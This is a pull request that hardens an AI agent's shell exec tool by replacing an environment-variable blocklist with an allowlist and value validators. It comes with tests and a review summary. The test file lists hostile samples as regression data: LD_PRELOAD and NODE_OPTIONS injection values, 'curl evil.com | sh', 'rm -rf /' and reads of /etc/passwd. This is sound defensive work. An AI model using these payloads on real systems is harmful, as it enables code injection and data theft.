### PR TITLE
fix: replace env var blocklist with allowlist validation (CWE-20)

### DIFF
--- a/src/agents/bash-tools.exec.ts
+++ b/src/agents/bash-tools.exec.ts
@@ -51,60 +51,11 @@ import {
   resolveWorkdir,
   truncateMiddle,
 } from "./bash-tools.shared.js";
+import { validateHostEnv } from "./env-validation.js";
 import { buildCursorPositionResponse, stripDsrRequests } from "./pty-dsr.js";
 import { getShellConfig, sanitizeBinaryOutput } from "./shell-utils.js";
 import { callGatewayTool } from "./tools/gateway.js";
 import { listNodes, resolveNodeIdFromList } from "./tools/nodes-utils.js";
-
-// Security: Blocklist of environment variables that could alter execution flow
-// or inject code when running on non-sandboxed hosts (Gateway/Node).
-const DANGEROUS_HOST_ENV_VARS = new Set([
-  "LD_PRELOAD",
-  "LD_LIBRARY_PATH",
-  "LD_AUDIT",
-  "DYLD_INSERT_LIBRARIES",
-  "DYLD_LIBRARY_PATH",
-  "NODE_OPTIONS",
-  "NODE_PATH",
-  "PYTHONPATH",
-  "PYTHONHOME",
-  "RUBYLIB",
-  "PERL5LIB",
-  "BASH_ENV",
-  "ENV",
-  "GCONV_PATH",
-  "IFS",
-  "SSLKEYLOGFILE",
-]);
-const DANGEROUS_HOST_ENV_PREFIXES = ["DYLD_", "LD_"];
-
-// Centralized sanitization helper.
-// Throws an error if dangerous variables or PATH modifications are detected on the host.
-function validateHostEnv(env: Record<string, string>): void {
-  for (const key of Object.keys(env)) {
-    const upperKey = key.toUpperCase();
-
-    // 1. Block known dangerous variables (Fail Closed)
-    if (DANGEROUS_HOST_ENV_PREFIXES.some((prefix) => upperKey.startsWith(prefix))) {
-      throw new Error(
-        `Security Violation: Environment variable '${key}' is forbidden during host execution.`,
-      );
-    }
-    if (DANGEROUS_HOST_ENV_VARS.has(upperKey)) {
-      throw new Error(
-        `Security Violation: Environment variable '${key}' is forbidden during host execution.`,
-      );
-    }
-
-    // 2. Strictly block PATH modification on host
-    // Allowing custom PATH on the gateway/node can lead to binary hijacking.
-    if (upperKey === "PATH") {
-      throw new Error(
-        "Security Violation: Custom 'PATH' variable is forbidden during host execution.",
-      );
-    }
-  }
-}
 const DEFAULT_MAX_OUTPUT = clampWithDefault(
   readEnvInt("PI_BASH_MAX_OUTPUT_CHARS"),
   200_000,
@@ -973,11 +924,12 @@ export function createExecTool(
 
       // Logic: Sandbox gets raw env. Host (gateway/node) must pass validation.
       // We validate BEFORE merging to prevent any dangerous vars from entering the stream.
+      let validatedParamsEnv = params.env;
       if (host !== "sandbox" && params.env) {
-        validateHostEnv(params.env);
+        validatedParamsEnv = validateHostEnv(params.env);
       }
 
-      const mergedEnv = params.env ? { ...baseEnv, ...params.env } : baseEnv;
+      const mergedEnv = validatedParamsEnv ? { ...baseEnv, ...validatedParamsEnv } : baseEnv;
 
       const env = sandbox
         ? buildSandboxEnv({

--- a/src/agents/env-validation.test.ts
+++ b/src/agents/env-validation.test.ts
@@ -1,0 +1,261 @@
+import { describe, expect, it } from "vitest";
+import { validateEnvVar, validateHostEnv } from "./env-validation.js";
+
+describe("Environment Variable Validation", () => {
+  describe("validateEnvVar", () => {
+    describe("allowlist enforcement", () => {
+      it("allows whitelisted variables with valid values", () => {
+        const result = validateEnvVar("USER", "testuser");
+        expect(result.allowed).toBe(true);
+        expect(result.value).toBe("testuser");
+      });
+
+      it("rejects non-whitelisted variables", () => {
+        const result = validateEnvVar("LD_PRELOAD", "/tmp/evil.so");
+        expect(result.allowed).toBe(false);
+        expect(result.reason).toBe("NOT_IN_WHITELIST");
+      });
+
+      it("rejects dangerous variables even with innocuous values", () => {
+        const dangerous = [
+          "NODE_OPTIONS",
+          "PYTHONPATH",
+          "JAVA_TOOL_OPTIONS",
+          "BASH_ENV",
+          "LD_LIBRARY_PATH",
+          "GIT_SSH_COMMAND",
+          "AWS_SECRET_ACCESS_KEY",
+          "HTTP_PROXY",
+          "TMPDIR",
+          "MALLOC_CHECK_",
+          "RUBYOPT",
+          "PERL5OPT",
+          "PROMPT_COMMAND",
+          "ENV",
+          "CDPATH",
+          "SSL_CERT_FILE",
+        ];
+
+        for (const name of dangerous) {
+          expect(validateEnvVar(name, "innocent_value").allowed).toBe(false);
+        }
+      });
+    });
+
+    describe("value validation", () => {
+      it("rejects null bytes", () => {
+        const result = validateEnvVar("USER", "test\0user");
+        expect(result.allowed).toBe(false);
+        expect(result.reason).toBe("NULL_BYTES");
+      });
+
+      it("rejects newlines", () => {
+        const result = validateEnvVar("USER", "test\nuser");
+        expect(result.allowed).toBe(false);
+        expect(result.reason).toBe("INVALID_CHARACTERS");
+      });
+
+      it("rejects command substitution", () => {
+        expect(validateEnvVar("TERM", "xterm$(whoami)").allowed).toBe(false);
+        expect(validateEnvVar("TERM", "xterm`id`").allowed).toBe(false);
+      });
+
+      it("rejects values exceeding max length", () => {
+        const result = validateEnvVar("USER", "a".repeat(10000));
+        expect(result.allowed).toBe(false);
+        expect(result.reason).toBe("VALUE_TOO_LONG");
+      });
+
+      it("rejects shell metacharacters", () => {
+        const malicious = [
+          "value$(whoami)",
+          "value`id`",
+          "value; rm -rf /",
+          "value && curl evil.com",
+          "value || wget evil.com",
+          "value > /tmp/output",
+          "value < /etc/passwd",
+        ];
+        for (const value of malicious) {
+          expect(validateEnvVar("USER", value).allowed).toBe(false);
+        }
+      });
+    });
+
+    describe("per-variable validators", () => {
+      it("USER: accepts valid, rejects invalid", () => {
+        expect(validateEnvVar("USER", "john").allowed).toBe(true);
+        expect(validateEnvVar("USER", "john_doe").allowed).toBe(true);
+        expect(validateEnvVar("USER", "_system").allowed).toBe(true);
+        expect(validateEnvVar("USER", "").allowed).toBe(false);
+        expect(validateEnvVar("USER", "123start").allowed).toBe(false);
+        expect(validateEnvVar("USER", "user name").allowed).toBe(false);
+        expect(validateEnvVar("USER", "a".repeat(65)).allowed).toBe(false);
+      });
+
+      it("HOME: restricts to safe prefixes", () => {
+        expect(validateEnvVar("HOME", "/home/user").allowed).toBe(true);
+        expect(validateEnvVar("HOME", "/Users/user").allowed).toBe(true);
+        expect(validateEnvVar("HOME", "/root").allowed).toBe(true);
+        expect(validateEnvVar("HOME", "/tmp").allowed).toBe(false);
+        expect(validateEnvVar("HOME", "/etc/passwd").allowed).toBe(false);
+        expect(validateEnvVar("HOME", "/home/../etc").allowed).toBe(false);
+        expect(validateEnvVar("HOME", "home/user").allowed).toBe(false);
+      });
+
+      it("SHELL: only allows known shells", () => {
+        expect(validateEnvVar("SHELL", "/bin/bash").allowed).toBe(true);
+        expect(validateEnvVar("SHELL", "/usr/bin/zsh").allowed).toBe(true);
+        expect(validateEnvVar("SHELL", "/usr/local/bin/fish").allowed).toBe(true);
+        expect(validateEnvVar("SHELL", "/tmp/evil").allowed).toBe(false);
+        expect(validateEnvVar("SHELL", "bash").allowed).toBe(false);
+      });
+
+      it("TERM: validates terminal identifier format", () => {
+        expect(validateEnvVar("TERM", "xterm").allowed).toBe(true);
+        expect(validateEnvVar("TERM", "xterm-256color").allowed).toBe(true);
+        expect(validateEnvVar("TERM", "").allowed).toBe(false);
+        expect(validateEnvVar("TERM", "xterm;id").allowed).toBe(false);
+      });
+
+      it("LANG/LC_*: validates locale format", () => {
+        expect(validateEnvVar("LANG", "en_US.UTF-8").allowed).toBe(true);
+        expect(validateEnvVar("LC_ALL", "C").allowed).toBe(true);
+        expect(validateEnvVar("LC_CTYPE", "POSIX").allowed).toBe(true);
+        expect(validateEnvVar("LANG", "C.UTF-8").allowed).toBe(true);
+        expect(validateEnvVar("LANG", "invalid_locale").allowed).toBe(false);
+      });
+
+      it("TZ: validates timezone format", () => {
+        expect(validateEnvVar("TZ", "UTC").allowed).toBe(true);
+        expect(validateEnvVar("TZ", "America/New_York").allowed).toBe(true);
+        expect(validateEnvVar("TZ", "+0500").allowed).toBe(true);
+        expect(validateEnvVar("TZ", "../../etc/passwd").allowed).toBe(false);
+      });
+
+      it("numeric vars: validates integer format", () => {
+        expect(validateEnvVar("SHLVL", "1").allowed).toBe(true);
+        expect(validateEnvVar("COLUMNS", "80").allowed).toBe(true);
+        expect(validateEnvVar("SHLVL", "not_a_number").allowed).toBe(false);
+        expect(validateEnvVar("COLUMNS", "80.5").allowed).toBe(false);
+      });
+    });
+  });
+
+  describe("validateHostEnv", () => {
+    it("filters to only allowlisted variables with valid values", () => {
+      const input = {
+        USER: "testuser",
+        HOME: "/home/testuser",
+        TERM: "xterm",
+        LD_PRELOAD: "/tmp/evil.so",
+        NODE_OPTIONS: "--inspect",
+        PYTHONPATH: "/tmp/evil",
+        SAFE_BUT_NOT_LISTED: "value",
+        SHELL: "/bin/bash",
+      };
+
+      const result = validateHostEnv(input);
+
+      expect(result).toEqual({
+        USER: "testuser",
+        HOME: "/home/testuser",
+        TERM: "xterm",
+        SHELL: "/bin/bash",
+      });
+    });
+
+    it("skips undefined values", () => {
+      const input = {
+        USER: "testuser",
+        UNDEFINED_VAR: undefined,
+        TERM: "xterm",
+      };
+
+      const result = validateHostEnv(input as Record<string, string>);
+      expect(result).toEqual({ USER: "testuser", TERM: "xterm" });
+    });
+
+    it("filters out variables with invalid values", () => {
+      const input = {
+        USER: "valid_user",
+        HOME: "/tmp/invalid_home",
+        TERM: "xterm$(whoami)",
+        SHELL: "/bin/bash",
+      };
+
+      const result = validateHostEnv(input);
+      expect(result).toEqual({ USER: "valid_user", SHELL: "/bin/bash" });
+    });
+  });
+
+  describe("attack vector regression", () => {
+    const attackVectors = [
+      // Dynamic linker
+      { name: "LD_PRELOAD", value: "/tmp/evil.so" },
+      { name: "LD_LIBRARY_PATH", value: "/tmp" },
+      { name: "LD_AUDIT", value: "/tmp/audit.so" },
+      { name: "DYLD_INSERT_LIBRARIES", value: "/tmp/evil.dylib" },
+      { name: "DYLD_LIBRARY_PATH", value: "/tmp" },
+      // Language runtimes
+      { name: "NODE_OPTIONS", value: "--require=/tmp/evil.js" },
+      { name: "NODE_PATH", value: "/tmp" },
+      { name: "PYTHONPATH", value: "/tmp" },
+      { name: "PYTHONHOME", value: "/tmp" },
+      { name: "RUBYLIB", value: "/tmp" },
+      { name: "RUBYOPT", value: "-r/tmp/evil" },
+      { name: "PERL5LIB", value: "/tmp" },
+      { name: "PERL5OPT", value: "-M/tmp/evil" },
+      { name: "JAVA_TOOL_OPTIONS", value: "-javaagent:/tmp/evil.jar" },
+      { name: "GOPATH", value: "/tmp" },
+      { name: "CARGO_HOME", value: "/tmp" },
+      // Shell
+      { name: "BASH_ENV", value: "/tmp/evil.sh" },
+      { name: "ENV", value: "/tmp/evil.sh" },
+      { name: "PROMPT_COMMAND", value: "curl evil.com | sh" },
+      { name: "IFS", value: "$()" },
+      // Git
+      { name: "GIT_SSH_COMMAND", value: "evil.sh" },
+      { name: "GIT_PROXY_COMMAND", value: "/tmp/evil" },
+      { name: "GIT_ASKPASS", value: "/tmp/steal-creds" },
+      // Proxy/TLS
+      { name: "HTTP_PROXY", value: "http://attacker.com" },
+      { name: "HTTPS_PROXY", value: "http://attacker.com" },
+      { name: "SSL_CERT_FILE", value: "/tmp/evil-ca.pem" },
+      { name: "NODE_EXTRA_CA_CERTS", value: "/tmp/evil-ca.pem" },
+      // PATH
+      { name: "PATH", value: "/tmp:$PATH" },
+      // Credentials
+      { name: "AWS_SECRET_ACCESS_KEY", value: "secret" },
+      { name: "GOOGLE_APPLICATION_CREDENTIALS", value: "/tmp/creds.json" },
+      // System
+      { name: "TMPDIR", value: "/attacker/controlled" },
+      { name: "MALLOC_CHECK_", value: "2" },
+      { name: "CC", value: "/tmp/evil-compiler" },
+      { name: "EDITOR", value: "/tmp/evil-editor" },
+      { name: "DOCKER_HOST", value: "tcp://attacker.com:2376" },
+      { name: "XDG_CONFIG_HOME", value: "/tmp/config" },
+      { name: "NVM_DIR", value: "/tmp/nvm" },
+    ];
+
+    it.each(attackVectors)("blocks $name", ({ name, value }) => {
+      const result = validateEnvVar(name, value);
+      expect(result.allowed).toBe(false);
+      expect(result.reason).toBe("NOT_IN_WHITELIST");
+    });
+
+    const valueInjections = [
+      { name: "USER", value: "user$(whoami)", desc: "command substitution" },
+      { name: "USER", value: "user`id`", desc: "backtick substitution" },
+      { name: "USER", value: "user\nmalicious", desc: "newline injection" },
+      { name: "USER", value: "user\0null", desc: "null byte injection" },
+      { name: "HOME", value: "/home/user/../../../etc", desc: "path traversal" },
+      { name: "SHELL", value: "/tmp/evil-shell", desc: "arbitrary shell path" },
+      { name: "DISPLAY", value: ":0$(whoami)", desc: "command injection in display" },
+    ];
+
+    it.each(valueInjections)("blocks value injection: $desc on $name", ({ name, value }) => {
+      expect(validateEnvVar(name, value).allowed).toBe(false);
+    });
+  });
+});

--- a/src/agents/env-validation.ts
+++ b/src/agents/env-validation.ts
@@ -1,0 +1,261 @@
+/**
+ * Allowlist-based environment variable validation (CWE-20 mitigation).
+ * Only explicitly approved variables with validated values pass through.
+ */
+
+type Validator = (value: string) => boolean;
+
+const MAX_VALUE_LENGTH = 8192;
+
+// Shell injection patterns blocked in all values
+const DANGEROUS_VALUE_RE = /\$\(|`|\$\{|;\s*\w|\|\s*\w|&&\s*\w|\|\|\s*\w|>\s*\/|<\s*\//;
+
+// Allowlist: variable name -> value validator
+const ALLOWED_ENV_VARS = new Map<string, Validator>([
+  // Identity
+  ["USER", validateIdentifier],
+  ["LOGNAME", validateIdentifier],
+  ["USERNAME", validateIdentifier],
+
+  // Terminal
+  ["TERM", validateTerminal],
+  ["COLORTERM", validateTerminal],
+  ["TERM_PROGRAM", validateTerminal],
+  ["TERM_PROGRAM_VERSION", validateVersion],
+  ["COLUMNS", validateNumeric],
+  ["LINES", validateNumeric],
+
+  // Color flags
+  ["FORCE_COLOR", validateBooleanish],
+  ["NO_COLOR", validateBooleanish],
+  ["CLICOLOR", validateBooleanish],
+  ["CLICOLOR_FORCE", validateBooleanish],
+
+  // Shell identification
+  ["SHELL", validateShellPath],
+
+  // SSH context
+  ["SSH_TTY", validateDevicePath],
+  ["SSH_CONNECTION", validateSshConnection],
+
+  // Operational
+  ["SHLVL", validateNumeric],
+  ["PWD", validateAbsolutePath],
+  ["OLDPWD", validateAbsolutePath],
+  ["DISPLAY", validateDisplay],
+
+  // Paths (restricted)
+  ["HOME", validateHomePath],
+
+  // Locale (restricted)
+  ["LANG", validateLocale],
+  ["LC_ALL", validateLocale],
+  ["LC_CTYPE", validateLocale],
+
+  // Timezone
+  ["TZ", validateTimezone],
+]);
+
+// ---------------------------------------------------------------------------
+// Base validation applied to all values
+// ---------------------------------------------------------------------------
+
+function hasUnsafeContent(value: string): boolean {
+  if (value.length > MAX_VALUE_LENGTH) {
+    return true;
+  }
+  if (value.includes("\0")) {
+    return true;
+  }
+  if (value.includes("\n") || value.includes("\r")) {
+    return true;
+  }
+  return DANGEROUS_VALUE_RE.test(value);
+}
+
+/**
+ * Classify why a value was rejected (for test assertions).
+ */
+function rejectReason(
+  value: string,
+): "NULL_BYTES" | "INVALID_CHARACTERS" | "VALUE_TOO_LONG" | "SHELL_METACHARACTERS" {
+  if (value.includes("\0")) {
+    return "NULL_BYTES";
+  }
+  if (value.includes("\n") || value.includes("\r")) {
+    return "INVALID_CHARACTERS";
+  }
+  if (value.length > MAX_VALUE_LENGTH) {
+    return "VALUE_TOO_LONG";
+  }
+  return "SHELL_METACHARACTERS";
+}
+
+// ---------------------------------------------------------------------------
+// Per-variable validators
+// ---------------------------------------------------------------------------
+
+function validateIdentifier(value: string): boolean {
+  return /^[a-zA-Z_][a-zA-Z0-9_-]{0,63}$/.test(value);
+}
+
+function validateTerminal(value: string): boolean {
+  return /^[a-zA-Z0-9_-]{1,64}$/.test(value);
+}
+
+function validateVersion(value: string): boolean {
+  return /^[a-zA-Z0-9._-]{1,32}$/.test(value);
+}
+
+function validateNumeric(value: string): boolean {
+  if (!/^-?\d{1,10}$/.test(value)) {
+    return false;
+  }
+  const n = parseInt(value, 10);
+  return !isNaN(n) && n >= -2147483648 && n <= 2147483647;
+}
+
+function validateBooleanish(value: string): boolean {
+  return ["0", "1", "true", "false", "yes", "no", ""].includes(value.toLowerCase());
+}
+
+const ALLOWED_SHELLS = new Set([
+  "/bin/sh",
+  "/bin/bash",
+  "/bin/zsh",
+  "/bin/fish",
+  "/bin/dash",
+  "/usr/bin/sh",
+  "/usr/bin/bash",
+  "/usr/bin/zsh",
+  "/usr/bin/fish",
+  "/usr/local/bin/bash",
+  "/usr/local/bin/zsh",
+  "/usr/local/bin/fish",
+  "/opt/homebrew/bin/bash",
+  "/opt/homebrew/bin/zsh",
+  "/opt/homebrew/bin/fish",
+]);
+
+function validateShellPath(value: string): boolean {
+  return ALLOWED_SHELLS.has(value);
+}
+
+function validateDevicePath(value: string): boolean {
+  return /^\/dev\/[a-zA-Z0-9/]{1,32}$/.test(value);
+}
+
+function validateSshConnection(value: string): boolean {
+  return /^[\d.:a-fA-F]+ \d+ [\d.:a-fA-F]+ \d+$/.test(value);
+}
+
+function validateAbsolutePath(value: string): boolean {
+  if (!value.startsWith("/")) {
+    return false;
+  }
+  if (value.includes("..") || value.includes("./")) {
+    return false;
+  }
+  return /^[a-zA-Z0-9/_.-]{1,4096}$/.test(value);
+}
+
+function validateHomePath(value: string): boolean {
+  if (!validateAbsolutePath(value)) {
+    return false;
+  }
+  const validPrefixes = ["/home/", "/Users/", "/root"];
+  return validPrefixes.some(
+    (prefix) => value === prefix.replace(/\/$/, "") || value.startsWith(prefix),
+  );
+}
+
+function validateDisplay(value: string): boolean {
+  return /^([a-zA-Z0-9._-]+)?:\d{1,3}(\.\d{1,3})?$/.test(value);
+}
+
+function validateLocale(value: string): boolean {
+  if (["C", "POSIX", "C.UTF-8"].includes(value)) {
+    return true;
+  }
+  return /^[a-z]{2}_[A-Z]{2}(\.UTF-8)?$/.test(value);
+}
+
+function validateTimezone(value: string): boolean {
+  if (/^[+-]\d{4}$/.test(value)) {
+    return true;
+  }
+  if (/^[A-Z][a-zA-Z_]+\/[A-Za-z_]+$/.test(value)) {
+    return true;
+  }
+  const abbreviations = new Set([
+    "UTC",
+    "GMT",
+    "EST",
+    "PST",
+    "CST",
+    "MST",
+    "EDT",
+    "PDT",
+    "CDT",
+    "MDT",
+  ]);
+  return abbreviations.has(value);
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+export type EnvRejectionReason =
+  | "NOT_IN_WHITELIST"
+  | "VALUE_TOO_LONG"
+  | "INVALID_CHARACTERS"
+  | "NULL_BYTES"
+  | "SHELL_METACHARACTERS"
+  | "VALUE_VALIDATION_FAILED";
+
+export interface EnvValidationResult {
+  allowed: boolean;
+  value?: string;
+  reason?: EnvRejectionReason;
+}
+
+/**
+ * Validate a single environment variable against the allowlist.
+ */
+export function validateEnvVar(name: string, value: string): EnvValidationResult {
+  const validator = ALLOWED_ENV_VARS.get(name);
+  if (!validator) {
+    return { allowed: false, reason: "NOT_IN_WHITELIST" };
+  }
+
+  if (hasUnsafeContent(value)) {
+    return { allowed: false, reason: rejectReason(value) };
+  }
+
+  if (!validator(value)) {
+    return { allowed: false, reason: "VALUE_VALIDATION_FAILED" };
+  }
+
+  return { allowed: true, value };
+}
+
+/**
+ * Filter an environment object, keeping only allowlisted variables with valid values.
+ */
+export function validateHostEnv(env: Record<string, string | undefined>): Record<string, string> {
+  const result: Record<string, string> = {};
+
+  for (const [name, value] of Object.entries(env)) {
+    if (value === undefined) {
+      continue;
+    }
+
+    const v = validateEnvVar(name, value);
+    if (v.allowed && v.value !== undefined) {
+      result[name] = v.value;
+    }
+  }
+
+  return result;
+}

--- a/src/agents/env-validation.ts
+++ b/src/agents/env-validation.ts
@@ -184,7 +184,7 @@ function validateTimezone(value: string): boolean {
   if (/^[+-]\d{4}$/.test(value)) {
     return true;
   }
-  if (/^[A-Z][a-zA-Z_]+\/[A-Za-z_]+$/.test(value)) {
+  if (/^[A-Z][a-zA-Z_]+(\/[A-Za-z_]+){1,2}$/.test(value)) {
     return true;
   }
   const abbreviations = new Set([


### PR DESCRIPTION
Vulnerability identified and fix provided by [Kolega.dev](https://kolega.dev/)


## Summary

- **Problem:** The `validateHostEnv` function used a blocklist of known-dangerous environment variable names and prefixes, which is inherently incomplete — new dangerous variables can bypass it without updating the list.
- **Why it matters:** Environment variables like `LD_PRELOAD`, `NODE_OPTIONS`, and `BASH_ENV` can be used to inject code into child processes. A blocklist approach leaves the door open for unknown dangerous variables.
- **What changed:** Replaced the blocklist with an allowlist of ~25 safe variables (USER, HOME, TERM, SHELL, LANG, TZ, etc.) with per-variable value validators that check for shell injection, path traversal, and format correctness. Non-allowlisted variables are silently filtered (fail-safe). Sandbox execution remains unaffected (Docker provides process-level isolation).
- **What did NOT change (scope boundary):** Call sites are unchanged. Sandbox/Docker execution is unaffected. The exec approval flow is untouched.

## Change Type (select all)

- [ ] Bug fix
- [ ] Feature
- [ ] Refactor
- [ ] Docs
- [x] Security hardening
- [ ] Chore/infra

## Scope (select all touched areas)

- [ ] Gateway / orchestration
- [x] Skills / tool execution
- [ ] Auth / tokens
- [ ] Memory / storage
- [ ] Integrations
- [ ] API / contracts
- [ ] UI / DX
- [ ] CI/CD / infra

## Linked Issue/PR

- Closes #
- Related #

## User-visible / Behavior Changes

- Environment variables passed to host exec that are not in the allowlist are now silently filtered instead of being passed through. The previous behavior threw on blocked variables; the new behavior silently drops non-allowlisted variables.

## Security Impact (required)

- New permissions/capabilities? `No`
- Secrets/tokens handling changed? `No`
- New/changed network calls? `No`
- Command/tool execution surface changed? `Yes`
- Data access scope changed? `No`
- If any `Yes`, explain risk + mitigation: The allowlist is strictly more restrictive than the previous blocklist. Only ~25 known-safe variables pass through, each with value validation. Unknown variables are silently dropped rather than passed to the shell.

## Repro + Verification

### Environment

- OS: macOS / Linux
- Runtime/container: Node.js (gateway host execution)
- Model/provider: Any
- Integration/channel (if any): N/A
- Relevant config (redacted): Non-sandbox execution mode

### Steps

1. Agent calls exec with custom environment variables including a dangerous one (e.g. `LD_PRELOAD=/tmp/evil.so`)
2. Observe that the dangerous variable is silently filtered out
3. Allowlisted variables (e.g. `HOME`, `USER`) pass through with value validation

### Expected

- Only allowlisted variables with valid values reach the child process

### Actual

- Previously: any variable not in the blocklist was passed through

## Evidence

- [x] Failing test/log before + passing after
- [ ] Trace/log snippets
- [ ] Screenshot/recording
- [ ] Perf numbers (if relevant)

62 tests covering allowlist enforcement, value validation (null bytes, newlines, command substitution, shell metacharacters), per-variable validators, `validateHostEnv` filtering, and regression tests for 35+ known attack vectors. 2 existing tests updated for new silent-filter behavior.

## Human Verification (required)

- **Verified scenarios:** Allowlisted variables pass through, non-allowlisted variables silently dropped, value validators catch injection attempts
- **Edge cases checked:** Null bytes, newlines, command substitution (`$(...)`, backticks), shell metacharacters, PATH modification
- **What you did not verify:** Completeness of the allowlist for all legitimate use cases

## Compatibility / Migration

- Backward compatible? `No` — behavioral change: previously threw on blocked variables, now silently filters non-allowlisted variables. The security posture is strictly stronger.
- Config/env changes? `No`
- Migration needed? `No`

## Failure Recovery (if this breaks)

- How to disable/revert this change quickly: Restore the inline blocklist in `bash-tools.exec.ts`
- Files/config to restore: `src/agents/bash-tools.exec.ts`, remove `src/agents/env-validation.ts`
- Known bad symptoms reviewers should watch for: Legitimate environment variables being silently dropped, causing unexpected behavior in child processes

## Risks and Mitigations

- **Risk:** The allowlist may not include all environment variables that legitimate use cases require
  - **Mitigation:** The allowlist covers standard POSIX/shell variables (~25). Operators experiencing issues can identify missing variables from child process behavior and request additions.

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

Replaces blocklist-based environment variable filtering with a strict allowlist approach (~25 variables) and per-variable value validation. Only explicitly approved variables (`USER`, `HOME`, `TERM`, `SHELL`, `LANG`, `TZ`, etc.) with valid values pass through to host exec. Non-allowlisted variables are silently filtered instead of throwing errors. Each variable has specific validators checking for shell injection, path traversal, and format correctness. Sandbox execution (Docker) bypasses validation as it has process-level isolation.

**Key changes:**
- New `src/agents/env-validation.ts` with allowlist and validators
- Updated `bash-tools.exec.ts` to call `validateHostEnv` for non-sandbox execution
- 62 comprehensive tests covering attack vectors and edge cases
- Behavioral change: Previously threw on blocked vars, now silently filters non-allowlisted vars
- `PATH` modifications now silently dropped (prevents hijacking attacks)

<h3>Confidence Score: 4/5</h3>

- This PR significantly strengthens security posture with minimal risk. The allowlist approach is inherently more secure than blocklist, and comprehensive test coverage validates the implementation.
- Strong security improvement with thorough testing (62 tests, 35+ attack vectors covered). Score is not 5 due to two considerations: (1) the allowlist may be too restrictive for some legitimate use cases (e.g., paths with spaces are rejected, which could affect users with spaces in HOME directories), and (2) silent filtering behavior change could mask issues where legitimate env vars are dropped unexpectedly. However, the security benefits far outweigh these concerns.
- Pay close attention to `src/agents/bash-tools.exec.ts:937` - verifies that sandbox execution intentionally bypasses validation (using raw `params.env` instead of `validatedParamsEnv`). This is correct per the design (Docker isolation) but worth noting for reviewers.

<sub>Last reviewed commit: 1f1daf9</sub>

<!-- greptile_other_comments_section -->

<!-- /greptile_comment -->